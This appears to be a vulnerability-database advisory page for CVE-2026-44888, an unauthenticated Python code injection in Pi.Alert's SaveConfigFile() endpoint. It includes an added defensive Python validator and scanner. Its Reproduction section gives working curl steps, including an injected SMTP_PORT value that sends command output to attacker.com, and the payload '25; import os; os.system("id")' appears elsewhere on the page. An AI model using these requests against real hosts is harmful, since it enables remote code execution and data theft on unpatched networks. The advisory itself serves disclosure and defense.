VYPR
Critical severity 9.8 · NVD Advisory · Published May 27, 2026

CVE-2026-44888

Description

Pi.Alert is a WIFI / LAN intruder detector with web service monitoring. Prior to 2026-05-07, Pi.Alert's SaveConfigFile() endpoint writes user-supplied numeric config values (e.g., SMTP_PORT) directly into pialert.conf without validation. Since pialert.conf is loaded via Python's exec() every 3–5 minutes by the background cron process, an attacker can inject arbitrary Python code and achieve unauthenticated OS-level RCE. On default installations (PIALERT_WEB_PROTECTION = False), no credentials are required. This vulnerability is fixed in 2026-05-07.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Unauthenticated Python code injection via Pi.Alert's SaveConfigFile() allows unvalidated config values to be executed by cron, leading to OS-level RCE.

Vulnerability

Pi.Alert versions prior to 2026-05-07 contain an unauthenticated arbitrary Python code injection vulnerability in the SaveConfigFile() endpoint (front/php/server/files.php). The endpoint writes user-supplied numeric config values (e.g., SMTP_PORT) directly into /config/pialert.conf without validation. The configuration file is then loaded via Python's exec() function every 3–5 minutes by the background cron process (back/pialert.py:52), allowing injection of arbitrary Python code. Other injectable fields include REPORT_MQTT_PORT, AUTO_DB_BACKUP_KEEP, PUSHSAFER_PRIO, and PUSHOVER_PRIO [1].

Exploitation

An unauthenticated attacker can exploit this vulnerability in two steps. First, obtain a valid session by accessing index.php — on default installations where PIALERT_WEB_PROTECTION is False, the server automatically grants a session without requiring credentials [1]. Second, send a POST request to files.php with action=SaveConfigFile and a crafted configfile parameter containing a numeric value appended with Python code, such as 25; import os; os.system("id"). The attacker must ensure the request reaches the vulnerable endpoint and that the cron service is running to trigger execution within the 3–5 minute window [1].

Impact

Successful exploitation results in unauthenticated remote code execution (RCE) as the operating system user running the Pi.Alert cron process. The attacker gains full control over the host system, including the ability to exfiltrate data, install malware, pivot to internal networks, and disrupt service availability [1].

Mitigation

The vulnerability is fixed in Pi.Alert version 2026-05-07 [1]. Users must update to this or any later release to remediate the issue. There are no known workarounds for unpatched installations; restricting network access to the Pi.Alert web interface and enabling PIALERT_WEB_PROTECTION may reduce risk but do not fully block exploitation if an attacker already has network access. The CVE is not listed in CISA's Known Exploited Vulnerabilities catalog as of publication date.

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

  • Leiweibau/Pi.alert (inferred), 2 versions
    • (no CPE) range: < 2026-05-07
    • (no CPE) range: < 2026-05-07

Patches: 0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing input validation on numeric config values allows injection of arbitrary Python code into a file loaded via exec()."

Attack vector

An unauthenticated attacker first obtains a session cookie by requesting `index.php` — on default installations (`PIALERT_WEB_PROTECTION = False`), no credentials are checked and a session is auto-granted [ref_id=1]. The attacker then sends a POST request to `SaveConfigFile()` with a crafted numeric config value (e.g., `SMTP_PORT`) containing a semicolon followed by arbitrary Python code. The value is written unquoted into `pialert.conf`. Within 3–5 minutes, the background cron process runs `pialert.py`, which calls `exec()` on the config file, executing the injected code as the OS user (typically `pi` or `root`) [ref_id=1].

Affected code

The vulnerable endpoint is `SaveConfigFile()` in `front/php/server/files.php`. The regex at line 564 captures unquoted values including semicolons and Python syntax, and numeric fields like `SMTP_PORT` (line 681) are written into `pialert.conf` without `is_numeric()` validation. The config is then loaded via `exec()` in `back/pialert.py:52` every 3–5 minutes by cron [ref_id=1].

What the fix does

The advisory states the fix is in the 2026-05-07 release but does not include a patch diff. The remediation guidance is to validate that numeric config values pass `is_numeric()` before writing them to `pialert.conf`, preventing injection of semicolons and Python syntax. Without such validation, the `exec()`-based config loading remains a direct RCE vector [ref_id=1].
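The advisory describes the fix only as `is_numeric()` validation before the value is written, and the mitigation section offers no workaround for the cron-side `exec()`. The following is an added example, not Pi.Alert's own code (the real fix lives in PHP in `files.php`), written in Python to show both halves of the defence: rejecting a non-integer value before it reaches `pialert.conf`, scanning an existing config file on a host that ran an unpatched release for values that do not parse as bare integers, and loading `KEY = literal` lines with `ast.literal_eval` instead of `exec()`, which refuses statements and calls outright. The list of numeric keys comes from the advisory; that Pi.Alert has no further numeric settings, and the exact `KEY = value` line layout, are assumptions, and the sample config contents are constructed.

```python
"""Added example (not Pi.Alert's own code): validate numeric config values
before writing them, scan an existing pialert.conf for injected values, and
load the file without exec(). Key names come from the advisory; the line
layout and the sample config contents below are assumptions/constructed."""
import ast
import re

# Numeric keys the advisory names as injectable. Assumption: the real project
# may define more numeric settings than these.
NUMERIC_KEYS = {
    "SMTP_PORT", "REPORT_MQTT_PORT", "AUTO_DB_BACKUP_KEEP",
    "PUSHSAFER_PRIO", "PUSHOVER_PRIO",
}

# A bare (optionally negative) integer: no ';', no whitespace, no trailing
# Python syntax. This is the is_numeric() check the advisory describes,
# tightened to integers because every listed key is a port, count or priority.
INTEGER_RE = re.compile(r"^-?\d+$")

# 'KEY = value' lines as pialert.conf stores them (assumed layout).
LINE_RE = re.compile(r"^\s*([A-Z0-9_]+)\s*=\s*(.*?)\s*$")


def validate_numeric(key: str, raw: str) -> int:
    """Return the integer value of a numeric setting or raise ValueError.

    Run before a user-supplied value is written: '25; import os' is rejected
    here instead of being stored verbatim for the cron job to exec()."""
    value = raw.strip()
    if not INTEGER_RE.fullmatch(value):
        raise ValueError(f"{key}: expected an integer, got {value!r}")
    return int(value)


def scan_config(text: str) -> list[tuple[int, str, str]]:
    """Return (line_no, key, value) for numeric keys whose stored value is
    not a bare integer, i.e. lines that would have executed as code."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m:
            continue
        key, value = m.groups()
        if key in NUMERIC_KEYS and not INTEGER_RE.fullmatch(value):
            findings.append((line_no, key, value))
    return findings


def load_config_safely(text: str) -> dict[str, object]:
    """Parse KEY = literal lines with ast.literal_eval instead of exec().

    literal_eval accepts only Python literals (numbers, strings, booleans,
    containers), so a value carrying statements or calls raises instead of
    running. Numeric keys are additionally checked to be ints."""
    config: dict[str, object] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        key, value = m.groups()
        try:
            parsed = ast.literal_eval(value)
        except (ValueError, SyntaxError) as exc:
            raise ValueError(f"{key}: not a literal: {value!r}") from exc
        if key in NUMERIC_KEYS and not isinstance(parsed, int):
            raise ValueError(f"{key}: expected int, got {type(parsed).__name__}")
        config[key] = parsed
    return config


# Constructed sample configs: a benign file and one carrying the injected
# value pattern the advisory describes.
CLEAN_CONF = "PIALERT_WEB_PROTECTION = False\nSMTP_PORT = 25\nPUSHOVER_PRIO = 0\n"
INJECTED_CONF = (
    "PIALERT_WEB_PROTECTION = False\n"
    "SMTP_PORT = 25; import os; os.system(\"id\")\n"
    "PUSHOVER_PRIO = 0\n"
)

if __name__ == "__main__":
    print("clean file findings:", scan_config(CLEAN_CONF))
    print("injected file findings:", scan_config(INJECTED_CONF))
    print("safe load:", load_config_safely(CLEAN_CONF))
```

`scan_config` is the part worth running on a deployed host: it needs no knowledge of what the injected code did, only that a numeric key holds something other than an integer, so it also catches variants the advisory does not list. `load_config_safely` shows why validation alone should not be the last line of defence; if the loader never calls `exec()`, a value that slips past the web layer still cannot run.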

Preconditions

  • config: Default config has PIALERT_WEB_PROTECTION = False, so no authentication is required
  • network: Attacker must have network access to the Pi.Alert web interface
  • config: The cron job that runs pialert.py must be active (runs every 3-5 minutes by default)
  • input: Attacker submits a crafted numeric config value containing Python code via the SaveConfigFile() endpoint

Reproduction

1. Obtain an unauthenticated session: `curl -c cookies.txt http://<target>/index.php`
2. Submit the injected config: `curl -b cookies.txt --data-urlencode "action=SaveConfigFile" --data-urlencode "configfile=...SMTP_PORT = 25; import os; os.system('curl http://attacker.com/$(id|base64 -w0)')..." http://<target>/php/server/files.php`
3. Within 3–5 minutes, the cron job triggers `exec()` on the config file, executing the injected command [ref_id=1].

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 1

News mentions: 0

No linked articles in our index yet.